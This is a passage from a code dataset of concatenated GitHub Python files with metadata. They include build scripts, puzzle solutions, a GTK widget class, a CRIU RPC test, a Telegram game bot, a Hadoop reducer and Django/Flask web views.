subprocess\n\nSRC_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nCMAKE_DIR = os.path.join(SRC_DIR, 'third_party', 'cmake')\nCMAKE_EXECUTABLE = os.path.join(CMAKE_DIR, 'bin', 'cmake.exe')\nOUT_DIR = os.path.join(SRC_DIR, 'out')\n\n\ndef generate_build_bat(dest_dir, msvs_bat_file_command, copy_command):\n lines = []\n # Save current dir and cd to build dir\n lines.append('pushd %~dp0')\n # Use local environment\n lines.append('setlocal')\n # Set up environment\n lines.append('call \"{}\" {}'.format(\n msvs_bat_file_command[0], ' '.join(msvs_bat_file_command[1:])))\n # Call ninja, passing it whatever user passed to .bat file.\n lines.append('ninja %*')\n # Restore environment\n lines.append('endlocal')\n if copy_command:\n lines.append(copy_command)\n # Restore directory\n lines.append('popd')\n dest_path = os.path.join(dest_dir, 'build.bat')\n with open(dest_path, 'w') as f:\n f.write('\\n'.join(lines))\n\n\ndef get_dir_name(build_type, platform_type):\n return build_type + '_' + platform_type\n\n\ndef gen_for_build_type(build_type, platform_type, msvs_bat_file_command):\n dest_dir = os.path.join(OUT_DIR, get_dir_name(build_type, platform_type))\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n if platform_type == 'x86':\n copy_command = 'copy bin\\\\*32* ..\\\\{}\\\\bin\\\\'.format(\n get_dir_name(build_type, 'amd64'))\n else:\n copy_command = None\n generate_build_bat(dest_dir, msvs_bat_file_command, copy_command)\n os.chdir(dest_dir)\n args = [\n CMAKE_EXECUTABLE,\n '-G', 'Ninja',\n '-DCMAKE_BUILD_TYPE=' + build_type,\n SRC_DIR\n ]\n subprocess.check_call(args)\n\n\ndef grab_environ(msvs_bat_file_command):\n args = list(msvs_bat_file_command)\n args.extend(['&', 'set'])\n output = subprocess.check_output(args)\n for line in output.split('\\r'):\n line = line.strip()\n if not line:\n continue\n var_name, var_value = line.split('=', 1)\n os.environ[var_name] = var_value\n\n\ndef gen_for_platform(vs_dir, platform_type):\n bat_path = os.path.join(vs_dir, 'VC', 'vcvarsall.bat')\n msvs_bat_file_command = [bat_path, platform_type]\n grab_environ(msvs_bat_file_command)\n gen_for_build_type('Debug', platform_type, msvs_bat_file_command)\n gen_for_build_type('RelWithDebInfo', platform_type, msvs_bat_file_command)\n\n\ndef main():\n vs_dir = os.path.dirname(os.path.dirname(os.path.dirname(\n os.environ['VS140COMNTOOLS'])))\n gen_for_platform(vs_dir, 'x86')\n gen_for_platform(vs_dir, 'amd64')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vchigrin/stakhanov","sub_path":"src/build/run_cmake.py","file_name":"run_cmake.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"27402141568","text":"Max = 0\r\nanswer = 0\r\nfor i in range(1, 1000000, 1):\r\n print(str(i))\r\n p = i\r\n n = i\r\n length = 0\r\n while n > 1:\r\n if n%2 == 0:\r\n n = n/2\r\n else:\r\n n = 3*n+1\r\n length += 1\r\n if length > Max:\r\n Max = length\r\n answer = p\r\n\r\nprint(\"Answer: \" + str(answer))\r\n","repo_name":"dreary-dugong/puzzles","sub_path":"ProjectEuler/problem14.py","file_name":"problem14.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43543976078","text":"import ctypes\n\nclass MyList:\n\n def __init__(self):\n self.capacity=1\n self.n=0\n self.A= self.__make_array(self.capacity)\n\n def __len__(self):\n return self.n\n \n def append(self,item):\n if self.capacity==self.n:\n #we have to resize the array\n self.__resize(2*self.capacity)\n self.A[self.n]=item\n self.n+=1 \n\n def __getitem__(self,index):\n if 0<=index/edit', methods=[\"GET\", \"POST\"])\n@acl.allows.requires(acl.is_admin)\ndef edit(door_id):\n door = models.Door.objects.get(id=door_id)\n\n form = DoorForm(obj=door)\n if not form.validate_on_submit():\n return render_template('/administration/doors/create-edit.html',\n form=form)\n\n form.populate_obj(door)\n door.save()\n\n return redirect(url_for('administration.doors.index'))\n\n\n@module.route('//delete')\n@acl.allows.requires(acl.is_admin)\ndef delete(door_id):\n door = models.Door.objects.get(id=door_id)\n door.status = 'delete'\n door.save()\n\n return redirect(url_for('administration.doors.index'))\n","repo_name":"r202-coe-psu/pichayon","sub_path":"pichayon/web/views/administration/doors.py","file_name":"doors.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72197364405","text":"with open(\"d09.txt\", \"r\") as f:\n nums = [\n int(line.strip())\n for line in f.readlines()\n if line.strip()\n ]\n\n\ndef calc1(plen, nums):\n cur = plen\n preamble = nums[:cur]\n psets = [\n {n+m for j, m in enumerate(preamble) if n != m}\n for i, n in enumerate(preamble)\n ]\n\n while cur < len(nums):\n v = nums[cur]\n if not any(map(lambda s: v in s, psets)):\n return v\n\n preamble = preamble[1:]\n preamble.append(v)\n\n psets = psets[1:]\n psets.append({v+n for n in preamble if v != n})\n\n cur += 1\n\n return None\n\n\nv = calc1(25, nums)\nprint(v)\n\n\ndef calc2(v, nums):\n b, e = 0, 1\n tot = sum(nums[b:e+1])\n while tot != v:\n if tot > v:\n b += 1\n else:\n e += 1\n tot = sum(nums[b:e+1])\n return min(nums[b:e+1]) + max(nums[b:e+1])\n\n\nprint(calc2(v, nums))\n","repo_name":"encetamasb/aoc2020","sub_path":"d09.py","file_name":"d09.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1772319288","text":"import os\nimport shutil\nfrom alphago.training.reinforcement_policy_trainer import run_training\nfrom config import slpolicy_model, slpolicy_weight, rlpolicy_weight\nfrom util import ask_yn\n\n\ndef learn_weights(weight_SL):\n run_training(cmd_line_args=[\n slpolicy_model,\n weight_SL,\n rlpolicy_weight,\n \"--save-every\", \"500\",\n \"--game-batch\", \"128\",\n \"--iterations\", \"10000\",\n \"--record-every\", \"50\",\n \"--move-limit\", \"400\",\n \"--verbose\",\n ])\n\n\ndef resume_learning(weight_RL):\n run_training(cmd_line_args=[\n slpolicy_model,\n weight_RL,\n rlpolicy_weight,\n # \"--save-every\", \"500\",\n # \"--game-batch\", \"20\",\n # \"--iterations\", \"10000\",\n \"--save-every\", \"100\",\n \"--game-batch\", \"1\",\n \"--iterations\", \"2\",\n \"--resume\",\n \"--verbose\",\n ])\n\n\nif __name__ == '__main__':\n flag = True\n if os.path.isdir(rlpolicy_weight):\n print(\"rlpolicy_weight is exists. Can I execute learn_weights?\")\n flag = ask_yn()\n\n weight_SL = os.path.join(slpolicy_weight, \"weights.00001.hdf5\")\n if flag: learn_weights(weight_SL)\n","repo_name":"syarig/Cygo","sub_path":"train_rl_policy_net.py","file_name":"train_rl_policy_net.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"40113429907","text":"\"\"\"\nDefines classes to represent a collection of views.\n\nFactsheet uses outlines containing topics and facts. ViewStack provides\na collection to contain and display views of items in an\noutline. ViewStack presents one view at a time.\n\"\"\"\nimport gi # type: ignore[import]\nimport logging\nimport typing\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk # type: ignore[import] # noqa: E402\n\nlogger = logging.getLogger('Main.VSTACK')\n\nNameView = str\nUiViewStack = typing.Union[Gtk.Stack]\nViewItem = typing.Union[Gtk.Widget]\n\n\nclass ViewStack:\n \"\"\"Displays view at a time from a collection of views.\n\n Each view is a presentation element for an item (such as a topic,\n fact, or fact value). Each item view is identified by a name.\n Methods use view name to add, show, pin, or remove the item view.\n The class supports pinning names. When a name is pinned, the\n corresponding view cannot be removed.\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initilize collection of item views.\"\"\"\n self._ui_view = Gtk.Stack()\n self._pinned: typing.MutableSequence[NameView] = list()\n\n def add_view(self, p_view: ViewItem, p_name: NameView) -> None:\n \"\"\"Add an item view with the given name to the collection.\n\n When the collection contains a view with the given name, log a\n warning and do not change the collection.\n\n :param p_view: item view to add.\n :param p_name: name of view. A name may appear at most once in\n the collection.\n \"\"\"\n child = self._ui_view.get_child_by_name(p_name)\n if child is not None:\n logger.warning(\n 'Duplicate view \\'{}\\' for name {} ({}.{})'\n ''.format(p_view, p_name, type(self).__name__,\n self.add_view.__name__))\n return\n\n self._ui_view.add_named(p_view, p_name)\n p_view.show()\n\n def clear(self) -> None:\n \"\"\"Remove all unpinned item views from collection.\"\"\"\n for view in self._ui_view:\n name = self._ui_view.child_get_property(view, 'name')\n self.remove_view(name)\n\n def __contains__(self, p_name: typing.Any) -> bool:\n \"\"\"Return True when collection contains item view with given name.\"\"\"\n if not isinstance(p_name, str):\n return False\n\n child = self._ui_view.get_child_by_name(p_name)\n if child is None:\n return False\n\n return True\n\n def get_name_visible(self) -> typing.Optional[NameView]:\n \"\"\"Return name of visible item view or None when no view is visible.\"\"\"\n return self._ui_view.get_visible_child_name()\n\n def pin_view(self, p_name: NameView) -> None:\n \"\"\"Pin an item view name so that the view cannot be removed.\n\n When the name does correspond to an item view in the collection\n or when the named view is pinned, log a warning.\n\n :param p_name: name of the item view to pin.\n \"\"\"\n view = self._ui_view.get_child_by_name(p_name)\n if view is None:\n logger.warning('No view named \\'{}\\' ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.pin_view.__name__))\n return\n\n if p_name in self._pinned:\n logger.warning('View named \\'{}\\' already pinned ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.pin_view.__name__))\n return\n\n self._pinned.append(p_name)\n\n def remove_view(self, p_name: NameView) -> None:\n \"\"\"Remove an item view from the collection.\n\n Log a warning when the name does correspond to an item view in\n the collection or when the named view is pinned..\n\n :param p_name: name of the item view to remove.\n \"\"\"\n if p_name in self._pinned:\n logger.warning('Pinned item view named \\'{}\\' cannot be removed '\n '({}.{})'.format(p_name, type(self).__name__,\n self.remove_view.__name__))\n return\n\n view_item = self._ui_view.get_child_by_name(p_name)\n if view_item is None:\n logger.warning('No item view named \\'{}\\' ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.remove_view.__name__))\n return\n\n self._ui_view.remove(view_item)\n\n def show_view(self, p_name: NameView) -> typing.Optional[NameView]:\n \"\"\"Attempt to show an item view and return name of visible view.\n\n Log a warning when no item view has given name.\n\n :param p_name: name of item view to show.\n \"\"\"\n item = self._ui_view.get_child_by_name(p_name)\n if item is not None:\n self._ui_view.set_visible_child(item)\n else:\n logger.warning('No item view named \\'{}\\' ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.show_view.__name__))\n name_visible = self._ui_view.get_visible_child_name()\n return name_visible\n\n @property\n def ui_view(self) -> UiViewStack:\n \"\"\"Return user interface element of stack.\"\"\"\n return self._ui_view\n\n def unpin_view(self, p_name: NameView) -> None:\n \"\"\"Unpin an item view so that it can be removed.\n\n Log a warning when the named view is not pinned..\n\n :param p_name: name of the item view to unpin.\n \"\"\"\n try:\n self._pinned.remove(p_name)\n except ValueError:\n logger.warning('View named \\'{}\\' not pinned ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.unpin_view.__name__))\n","repo_name":"gary9204/StuckFactsheet","sub_path":"src/factsheet/view/view_stack.py","file_name":"view_stack.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24989133563","text":"#!/usr/bin/python3\n\nimport argparse\nimport os\nimport sys\nimport time\nfrom tempfile import mkstemp\n\nimport rpc_pb2 as rpc\n\nfrom setup_swrk import setup_swrk\n\nlog_file = 'config_file_test.log'\ndoes_not_exist = 'does-not.exist'\n\n\ndef setup_config_file(content):\n # Creating a temporary file which will be used as configuration file.\n fd, path = mkstemp()\n\n with os.fdopen(fd, 'w') as f:\n f.write(content)\n\n os.environ['CRIU_CONFIG_FILE'] = path\n\n return path\n\n\ndef cleanup_config_file(path):\n if os.environ.get('CRIU_CONFIG_FILE', None) is not None:\n del os.environ['CRIU_CONFIG_FILE']\n os.unlink(path)\n\n\ndef cleanup_output(path):\n for f in (does_not_exist, log_file):\n f = os.path.join(path, f)\n if os.access(f, os.F_OK):\n os.unlink(f)\n\n\ndef setup_criu_dump_request():\n # Create criu msg, set it's type to dump request\n # and set dump options. Checkout more options in protobuf/rpc.proto\n req = rpc.criu_req()\n req.type = rpc.DUMP\n req.opts.leave_running = True\n req.opts.log_level = 4\n req.opts.log_file = log_file\n req.opts.images_dir_fd = os.open(args['dir'], os.O_DIRECTORY)\n # Not necessary, just for testing\n req.opts.tcp_established = True\n req.opts.shell_job = True\n return req\n\n\ndef do_rpc(s, req):\n # Send request\n s.send(req.SerializeToString())\n\n # Recv response\n resp = rpc.criu_resp()\n MAX_MSG_SIZE = 1024\n resp.ParseFromString(s.recv(MAX_MSG_SIZE))\n\n s.close()\n return resp\n\n\ndef test_broken_configuration_file():\n # Testing RPC configuration file mode with a broken configuration file.\n # This should fail\n content = 'hopefully-this-option-will-never=exist'\n path = setup_config_file(content)\n swrk, s = setup_swrk()\n s.close()\n # This test is only about detecting wrong configuration files.\n # If we do not sleep it might happen that we kill CRIU before\n # it parses the configuration file. A short sleep makes sure\n # that the configuration file has been parsed. Hopefully.\n # (I am sure this will fail horribly at some point)\n time.sleep(0.3)\n swrk.kill()\n return_code = swrk.wait()\n # delete temporary file again\n cleanup_config_file(path)\n if return_code != 1:\n print('FAIL: CRIU should have returned 1 instead of %d' % return_code)\n sys.exit(-1)\n\n\ndef search_in_log_file(log, message):\n with open(os.path.join(args['dir'], log)) as f:\n if message not in f.read():\n print(\n 'FAIL: Missing the expected error message (%s) in the log file'\n % message)\n sys.exit(-1)\n\n\ndef check_results(resp, log):\n # Check if the specified log file exists\n if not os.path.isfile(os.path.join(args['dir'], log)):\n print('FAIL: Expected log file %s does not exist' % log)\n sys.exit(-1)\n # Dump should have failed with: 'The criu itself is within dumped tree'\n if resp.type != rpc.DUMP:\n print('FAIL: Unexpected msg type %r' % resp.type)\n sys.exit(-1)\n if 'The criu itself is within dumped tree' not in resp.cr_errmsg:\n print('FAIL: Missing the expected error message in RPC response')\n sys.exit(-1)\n # Look into the log file for the same message\n search_in_log_file(log, 'The criu itself is within dumped tree')\n\n\ndef test_rpc_without_configuration_file():\n # Testing without configuration file\n # Just doing a dump and checking for the logfile\n req = setup_criu_dump_request()\n _, s = setup_swrk()\n resp = do_rpc(s, req)\n s.close()\n check_results(resp, log_file)\n\n\ndef test_rpc_with_configuration_file():\n # Testing with configuration file\n # Just doing a dump and checking for the logfile\n\n # Setting a different log file via configuration file\n # This should not work as RPC settings overwrite configuration\n # file settings in the default configuration.\n log = does_not_exist\n content = 'log-file ' + log + '\\n'\n content += 'no-tcp-established\\nno-shell-job'\n path = setup_config_file(content)\n req = setup_criu_dump_request()\n _, s = setup_swrk()\n do_rpc(s, req)\n s.close()\n cleanup_config_file(path)\n # Check if the specified log file exists\n # It should not as configuration files do not overwrite RPC values.\n if os.path.isfile(os.path.join(args['dir'], log)):\n print('FAIL: log file %s should not exist' % log)\n sys.exit(-1)\n\n\ndef test_rpc_with_configuration_file_overwriting_rpc():\n # Testing with configuration file\n # Just doing a dump and checking for the logfile\n\n # Setting a different log file via configuration file\n # This should not work as RPC settings overwrite configuration\n # file settings in the default configuration.\n log = does_not_exist\n content = 'log-file ' + log + '\\n'\n content += 'no-tcp-established\\nno-shell-job'\n path = setup_config_file(content)\n # Only set the configuration file via RPC;\n # not via environment variable\n del os.environ['CRIU_CONFIG_FILE']\n req = setup_criu_dump_request()\n req.opts.config_file = path\n _, s = setup_swrk()\n resp = do_rpc(s, req)\n s.close()\n cleanup_config_file(path)\n check_results(resp, log)\n\n\nparser = argparse.ArgumentParser(\n description=\"Test config files using CRIU RPC\")\nparser.add_argument('dir',\n type=str,\n help=\"Directory where CRIU images should be placed\")\n\nargs = vars(parser.parse_args())\n\ncleanup_output(args['dir'])\n\ntest_broken_configuration_file()\ncleanup_output(args['dir'])\ntest_rpc_without_configuration_file()\ncleanup_output(args['dir'])\ntest_rpc_with_configuration_file()\ncleanup_output(args['dir'])\ntest_rpc_with_configuration_file_overwriting_rpc()\ncleanup_output(args['dir'])\n","repo_name":"checkpoint-restore/criu","sub_path":"test/others/rpc/config_file.py","file_name":"config_file.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","stars":2427,"dataset":"github-code","pt":"76"} +{"seq_id":"42397487459","text":"mese = input(\"metti il nome del mese: \")\n\ngiorno = int(input(\"metti il numero del giorno: \"))\n\n\nif mese == \"gennaio\" or mese == \"Febbraio\":\n stagione = \"inverno\"\nelif mese == \"Marzo\":\n if giorno < 20:\n stagione = \"inverno\"\n else:\n stagione = \"primavera\"\nelif mese == \"Aprile\" or mese == \"Maggio\":\n stagione = \"primavera\"\nelif mese == \"giugno\":\n if giorno < 21:\n stagione = \"primavera\"\n else:\n stagione = \"estate\"\nelif mese == \"luglio\" or mese == \"agosto\":\n stagione = \"estate\"\nelif mese == \"Settembre\":\n if giorno < 22:\n stagione = \"estate\"\n else:\n stagione = \"autunno\"\nelif mese == \"ottobre\" or mese == \"novembre\":\n stagione = \"autunno\"\nelif mese == \"Dicembre\":\n if giorno < 21:\n stagione = \"autunno\"\n else:\n stagione = \"inverno\"\n \n \nprint(stagione)","repo_name":"GiuseppeGambac/Python","sub_path":"02_Condizioni/_47_stagioni.py","file_name":"_47_stagioni.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72122064887","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler, Filters,ConversationHandler\nfrom logging_sw import *\nfrom random import randint\n\nfrom enum import Enum\n\ndef hello_command(update: Update, context: CallbackContext):\n log_sw(update, context)\n update.message.reply_text(f'Привет {update.effective_user.first_name} для начала нажмите /start\\n')\n\n\n\nglobal sweets\nsweets=100\nmax_sweets=28\n\nclass State(Enum):\n WAIT_COMMAND_USER1 = 1\n NONE = 3\n\nglobal state \nstate = State.NONE\n\n\ndef process_input_man(taken_sweets):\n global sweets\n global max_sweets\n if taken_sweets > max_sweets or taken_sweets> sweets:\n return False\n sweets -= taken_sweets\n return True\n \n\ndef bot_action():\n global sweets\n global max_sweets\n if sweets>max_sweets:\n bot_sweets = randint(1, max_sweets)\n sweets -= bot_sweets\n return bot_sweets\n else:\n bot_sweets = randint(1, sweets)\n sweets -= bot_sweets\n return bot_sweets\n\ndef input_handler(update: Update, context: CallbackContext):\n global sweets\n global max_sweets\n global state\n if state == State.WAIT_COMMAND_USER1:\n if not process_input_man(int(update.message.text)):\n update.message.reply_text(f'Ты не можешь взять такое количество конфет')\n return\n if sweets <= 0:\n update.message.reply_text(f'Увы, ты проиграл')\n state = State.NONE\n sweets=100\n else:\n play_bot(update=update, context=context)\n elif state == State.NONE:\n update.message.reply_text(f'Правила игры:\\n 1.У нас есть 100 конфет\\n 2. Максимально можно взять {max_sweets}\\n 3. Кто последний взял тот проиграл \\n и последнее кто первый начнет игру, если человек нажмите /m\\n если бот нажмите /b\\n')\n\n\ndef play_man(update: Update, context: CallbackContext):\n update.message.reply_text(f'Сейчас {sweets}\\n Сколько конфет возьмешь?')\n global state\n state = State.WAIT_COMMAND_USER1\n\ndef play_bot(update: Update, context: CallbackContext):\n global sweets\n global state\n bot_sweets = bot_action()\n if sweets <= 0:\n update.message.reply_text(f'Я взял {bot_sweets}, Я проиграл!')\n state =State.NONE\n sweets = 100\n else:\n update.message.reply_text(f'Хорошо, я взял {bot_sweets}') \n play_man(update, context)","repo_name":"Filippok82/working_version_bot","sub_path":"commands_sw.py","file_name":"commands_sw.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36880862360","text":"class LazyProperty:\n\tdef __init__(self, func):\n\t\tself.func = func\n\t\tself.name = func.__name__\n\tdef __get__(self, instance, owner):\n\t\tif not instance:\n\t\t\t# クラス変数としてアクセスされたときの処理\n\t\t\treturn self\n\t\t# self.funcは関数なので明示的にインスタンスを渡す\n\t\tv = self.func(instance)\n\t\tinstance.__dict__[self.name] = v\n\t\treturn v\n\nTAX_PATE = 1.10\nclass Book:\n\tdef __init__(self, raw_price):\n\t\tself.raw_price = raw_price\n\t@LazyProperty\n\tdef price(self):\n\t\tprint(\"calculate the price\")\n\t\treturn int(self.raw_price * TAX_PATE)\n\nbook = Book(1980)\nprint(book.price)\n\nprint(book.price)\n","repo_name":"souta-pqr/Program_Practice","sub_path":"python/jissen/9/des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29016230338","text":"#!/usr/bin/python\nimport sys\n\n#global variable\nisFirst = True\nthisTerm = \"\"\nlastTerm = \"\"\nthisID = -1\nlastID = -1\ndocIDs = []\n\n#reducer function for this treducer\nfor line in sys.stdin:\n\tterms = line.replace('\\n','').rsplit('\\t', 1)\n\tthisTerm = terms[0] #key\n\tthisID = terms[1] #value\n\tif isFirst:\n\t\tisFirst = False\n\t\tlastTerm = thisTerm\n\t\tlastID = thisID\n\tif lastID not in docIDs:\n\t\tdocIDs.append(lastID)\n\tif thisTerm != lastTerm:\n\t\tprint(lastTerm + '\\t' + str(docIDs))\n\t\tdocIDs.clear()\n\t\n\tlastTerm = thisTerm\n\tlastID = thisID\n\n#print the last key and value\nif lastID not in docIDs:\n\tdocIDs.append(lastID)\nprint(lastTerm + '\\t' + str(docIDs))\ndocIDs.clear()","repo_name":"frankGz/Bigdata_Analytics","sub_path":"hadoop_mapreduce/iireducer.py","file_name":"iireducer.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36383449008","text":"# https://www.acmicpc.net/problem/13305\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nrail = list(map(int,input().split()))\r\ncost= list(map(int,input().split()))\r\n\r\nmin_cost = cost[0]\r\nanswer = 0\r\nfor i in range(n-1):\r\n if min_cost > cost[i]:\r\n min_cost = cost[i]\r\n answer += min_cost * rail[i]\r\n# 꼭 dp여도 dp list를 만들 필요는 없다\r\nprint(answer)","repo_name":"HyNS00/Beakjoon_hub","sub_path":"백준/Silver/13305. 주유소/주유소.py","file_name":"주유소.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42125283528","text":"from django.shortcuts import render, render_to_response,redirect, get_object_or_404\nfrom django.contrib.auth import authenticate, login\nfrom django.http.response import HttpResponse,Http404\nfrom .models import User, Domain, Items, Relation\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template.context_processors import csrf\nfrom django.utils import timezone\nfrom django.views import View,generic\nfrom .forms import UserRegistrationForm, DomainForm, ItemsForm, RelationForm, UploadFileForm\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth import logout as auth_logout\nfrom django.urls import reverse\nfrom django.template import loader, RequestContext\nfrom django.views.decorators.csrf import csrf_exempt, csrf_protect\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm\n\n''' \n ItemsListView, RelationListView, DomainListView, DataListView \n classes to generate a list items views \n'''\nclass ItemsListView(View):\n model = Items\n def get(self,request):\n items_list = Items.objects.order_by('name').all()\n domain_list = Domain.objects.all()\n return render(request, 'dataprocessing/items_list.html', {'items_list': items_list, 'domain_list': domain_list})\n \n\nclass RelationListView(generic.ListView):\n model = Relation\n def get_queryset(self):\n return Relation.objects.all()\n\nclass DomainListView(generic.ListView):\n model = Domain\n def get_queryset(self):\n return Domain.objects.all()\n''' \n index to render the main page \n'''\n@login_required\ndef index(request):\n # Render the HTML template index.html with the data in the context variable\n domain_list = Domain.objects.filter(user=request.user)\n num_domain = Domain.objects.all().count()\n num_relation = Relation.objects.all().count()\n num_items = Items.objects.filter(author = request.user).count()\n return render(\n request,\n 'index.html',\n context={'num_domain':num_domain,'num_items':num_items,'num_relation':num_relation,'domain_list':domain_list}\n )\n\n''' \n Relation Block\n post and edit relation views \n'''\n@login_required\ndef edit_relation(request, pk):\n # Render the HTML template to edit relations\n relation = get_object_or_404(Relation, pk=pk)\n if request.method == \"POST\":\n form = RelationForm(request.POST, instance=relation)\n\n if form.is_valid():\n relation = form.save(commit=False)\n form.save()\n return redirect('/relation/')\n else:\n form = RelationForm(instance=relation)\n return render(request, 'dataprocessing/edit_relation.html', {'form': form})\n\ndef same_parent_relation(form):\n try:\n if form.cleaned_data['relation'] == '1':\n items_same_parent = list(form.cleaned_data['item2'])\n for item in items_same_parent:\n q = form.cleaned_data['item2'].exclude(name = item)\n item_id = Items.objects.get(name = item).id\n relation = Relation(item1 = Items.objects.get(pk = item_id), relation = '6')\n relation.save()\n relation.item2.set(q) \n except:\n pass\n\n@login_required\ndef post_relation(request):\n # Render the HTML template to post relations\n if request.method == \"POST\":\n form = RelationForm(request.POST)\n if form.is_valid():\n same_parent_relation(form)\n relation = form.save(commit=False)\n form.save()\n item = Items.objects.get(id = relation.item1.id)\n value = item.value\n item.value = int(value) + relation.item2.all().count()\n item.save()\n return redirect('/relation/')\n else:\n form = RelationForm()\n return render(request, 'dataprocessing/edit_relation.html', {'form': form})\n'''\n Domain Block\n post and edit domain views \n'''\n@login_required\n@permission_required('is_staff')\ndef post_domain(request):\n # Render the HTML template for superuser to create domain\n if request.method == \"POST\":\n form = DomainForm(request.POST)\n if form.is_valid():\n domain = form.save(commit=False)\n form.save()\n return redirect('/domain/')\n else:\n form = DomainForm()\n\n return render(request, 'dataprocessing/edit_domain.html', {'form': form})\n\n@login_required\n@permission_required('is_staff')\ndef edit_domain(request, pk):\n # Render the HTML template to edit domain\n domain = get_object_or_404(Domain, pk=pk)\n if request.method == \"POST\":\n form = DomainForm(request.POST, instance=domain)\n if form.is_valid():\n domain = form.save(commit=False)\n form.save()\n return redirect('/domain/')\n else:\n form = DomainForm(instance = domain)\n return render(request, 'dataprocessing/edit_domain.html', {'form': form})\n\n''' \n Items Block\n post and edit item views \n'''\n\n@login_required\ndef post_item(request):\n # Render the HTML template to post items\n if request.method == \"POST\":\n form = ItemsForm(request.POST)\n if form.is_valid():\n #Duplicate check\n if not Items.objects.filter(name = form.cleaned_data['name']).exists():\n items = form.save(commit=False)\n items.author = request.user\n form.save()\n\n return redirect('/items/')\n\n else:\n form = ItemsForm()\n return render(request, 'dataprocessing/edit_items.html', {'form': form})\n\n@login_required\ndef edit_item(request, pk):\n # Render the HTML template to edit items\n items = get_object_or_404(Items, pk=pk)\n if request.method == \"POST\":\n form = ItemsForm(request.POST, instance=items)\n if form.is_valid():\n items = form.save(commit=False)\n form.save()\n return redirect('/items/')\n else:\n form = ItemsForm(instance = items)\n return render(request, 'dataprocessing/edit_items.html', {'form': form})\n@login_required\ndef detail_item(request, pk):\n # Render the HTML template to edit items\n item = get_object_or_404(Items, pk=pk)\n relation = Relation.objects.filter(item1 = pk)\n print(relation)\n return render(request, 'dataprocessing/detail_items.html', {'item': item, 'relation':relation})\n\n@login_required\ndef item_delete(request, pk):\n items = Items.objects.get (pk = pk)\n items.delete()\n return redirect('/items/')\n\ndef register(request):\n # Render the HTML template to register\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # Create a new user object but avoid saving it yet\n new_user = user_form.save(commit=False)\n # Set the chosen password\n new_user.set_password(user_form.cleaned_data['password'])\n # Save the User object\n new_user.save()\n return render(request, 'accounts/login.html', {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n return render(request, 'accounts/register.html', {'user_form': user_form})\n\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form = PasswordChangeForm(data=request.POST, user=request.user)\n\n if form.is_valid():\n form.save()\n update_session_auth_hash(request, form.user)\n return redirect(reverse('accounts:view_profile'))\n else:\n return redirect(reverse('accounts:change_password'))\n else:\n form = PasswordChangeForm(user=request.user)\n\n args = {'form': form}\n return render(request, 'accounts/change_password.html', args)\n''' \n File Upload Block\n views for uploading keywords via txt file\n'''\n\ndef upload(request):\n try:\n if request.method == 'POST':\n data = handle_uploaded_file(request.FILES['file'], str(request.FILES['file'])).splitlines()\n items_list = []\n for i in data:\n items_list.extend(i.strip().split(', '))\n\n domain_id = Domain.objects.get(name = request.POST.get(\"domain\")).id\n\n for i in items_list:\n if Items.objects.filter(name = i).exists():\n continue;\n else:\n item = Items(name = i, domain = Domain.objects.get(pk=domain_id),\n author = request.user, source = 'uploaded')\n item.save()\n if request.POST.get(\"hierarchy\"):\n set_relation(data,\"1\")\n return redirect('/items/')\n except:\n HttpResponse(\"Что-то не так\")\n return redirect('/items/')\n\n\"\"\"\nФункция обработчик загружаемого файла\n\"\"\"\nimport os\ndef handle_uploaded_file(file, filename):\n if not os.path.exists('upload/'):\n os.mkdir('upload/')\n with open('upload/' + filename, 'wb+') as destination:\n for chunk in file.chunks():\n destination.write(chunk)\n with open('upload/' + filename, encoding = 'utf-8') as f:\n data=f.read()\n return data\n\ndef set_relation(file, type_relation):\n course = file[0]\n file.remove(file[0])\n section = file[::2]\n print(type_relation)\n new_items = [ Items.objects.get(name = t) for t in section ]\n #check whether relation already exist\n\n item_id = Items.objects.get(name = course).id\n rel = Relation(item1 = Items.objects.get(pk=item_id) , relation = type_relation)\n rel.save()\n 